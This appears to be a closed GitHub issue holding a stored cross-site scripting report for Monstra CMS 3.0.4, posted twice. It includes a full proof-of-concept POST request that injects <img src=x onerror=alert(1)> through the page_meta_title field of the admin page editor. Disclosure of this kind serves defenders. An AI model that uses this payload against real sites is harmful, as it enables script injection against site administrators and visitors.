Closed PrincyEdward closed 3 years ago
Monstra - version 3.0.4
Exploit uri -> http://localhost/path/admin/index.php?id=pages&action=edit_page&name=error404 Parameter -> page_meta_title
POC:
POST /localhost/path/admin/index.php?id=pages&action=edit_page&name=error404 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://ocalhost/path/monstra/monstra-3.0.4/admin/index.php?id=pages&action=edit_page&name=error404 Content-Type: application/x-www-form-urlencoded Content-Length: 475 Cookie: admin_username=admin; PHPSESSID=68m15vretbrdhhfa2ac19nqe17; Connection: close Upgrade-Insecure-Requests: 1
csrf=8a49185957df40c6b8bb8b3595663dedc3ffcb19&page_old_name=error404&old_parent=&page_id=1&page_title=error404+&page_name=error404&page_meta_title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&page_keywords=&page_description=&pages=&templates=index&status=published&access=public&editor=%3Ch2%3E404+Page+Not+Found%3C%2Fh2%3E%3Cdiv%3EWe%27re+sorry+but+the+page+you+are+looking+for+doesn%27t+appear+to+exist%21%3C%2Fdiv%3E&page_tags=&edit_page=Save&page_date=2012-02-03+17%3A30%3A00
This issue not for MiniCMS
bg5sbk
commented
3 years ago bg5sbk
commented
3 years ago
Monstra - version 3.0.4
Exploit uri -> http://localhost/path/admin/index.php?id=pages&action=edit_page&name=error404 Parameter -> page_meta_title
POC:
POST /localhost/path/admin/index.php?id=pages&action=edit_page&name=error404 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://ocalhost/path/monstra/monstra-3.0.4/admin/index.php?id=pages&action=edit_page&name=error404 Content-Type: application/x-www-form-urlencoded Content-Length: 475 Cookie: admin_username=admin; PHPSESSID=68m15vretbrdhhfa2ac19nqe17; Connection: close Upgrade-Insecure-Requests: 1
csrf=8a49185957df40c6b8bb8b3595663dedc3ffcb19&page_old_name=error404&old_parent=&page_id=1&page_title=error404+&page_name=error404&page_meta_title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&page_keywords=&page_description=&pages=&templates=index&status=published&access=public&editor=%3Ch2%3E404+Page+Not+Found%3C%2Fh2%3E%3Cdiv%3EWe%27re+sorry+but+the+page+you+are+looking+for+doesn%27t+appear+to+exist%21%3C%2Fdiv%3E&page_tags=&edit_page=Save&page_date=2012-02-03+17%3A30%3A00